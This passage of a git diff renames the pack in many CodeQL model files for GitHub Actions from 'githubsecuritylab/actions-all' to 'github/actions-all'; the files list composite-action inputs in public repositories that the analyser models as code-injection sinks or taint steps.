"input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 8cea15ac9e1..679b362ba3f 100644 
--- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index 766ec515551..8e11db68c85 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index 13ee2f4e7a8..deed2d12573 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index 0cf05c2273b..353cb30683b 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 7f2622feecd..25522a67b69 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index 3aa8c3bc649..c545ad6844e 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index b79317db9c8..941710eb0fe 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index 843e0d20b98..75b744fc036 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 2a0fd3ac371..7a4ea3514ba 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index 3ef29cc9b84..25a25d085ad 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 71d2012eb02..23bd58d66cb 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index a67aeb90595..1849ad0e2f5 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index 1f5dd108f91..c4861c77842 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index ea4a2a2a3c7..b11931b5408 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index 29973ccdbd7..1b3fffbe869 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index 2db70ffea66..df6f6088087 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 8a4273e8caf..89c10bd95c2 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index de09b35f1d4..4a471b5a97c 100644 
--- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 91e6268e614..9f2448a6d75 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index 777212d9a0a..dc8a362dc96 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index 8cc0ab83a42..a1f2ccb164e 100644 
--- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index f1244bdd5de..303f9d56cb2 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 37814510c8c..2f28cf86431 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index 48e40c36bea..efbcceb48f5 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index 0edb2c5f8cd..649fac9fede 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index 61210d17abb..3623fe51e84 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index 22dc1a40629..d730cdb6a99 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index b2888b571a8..bcec913ef7c 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml index bc188d91f1b..ad5ec2e544f 100644 --- a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index d5defe67401..9c5c38007bc 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index d97fedbed13..8899c0563e8 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index e22c29b09f1..f71c818a337 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml index 7203bb8345c..989eca71960 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index dcfbb0ea203..2666233ac87 100644 
--- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index 6c5d6edd572..e8aa6be8fa6 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index fdaee61066e..9bd16741353 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index d68c4e57c8a..3c50e297eb5 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index 85a8d2f4d65..d1c181a8707 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index d2275409278..5b600a4cad4 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index 4dc0b87214b..65fdcb11a00 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index ea1a8a8afec..08c3ff9cf43 100644 
--- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index 5ce00c29e52..c06978549fb 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index d1f551b66da..eaca3fb9c62 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index 6f8845ec1c0..e1c608d3e10 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index 152fdfed447..dc1f7a7b3b8 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index 5919ade7e81..a80ce46abc5 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index d9afa5bb21f..15886c2c945 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 0b36853a891..45769a727d8 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 2bd521d42f5..9f85415a482 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index 8ae81e706a4..bbfb20551af 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml index 4893772b71a..f8dc63ee029 100644 
--- a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index e174c830a85..5ad65dcc0bd 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index 14070215bfa..90b6b38b6b0 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index f3a0b47f2c2..4f1157d862a 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml 
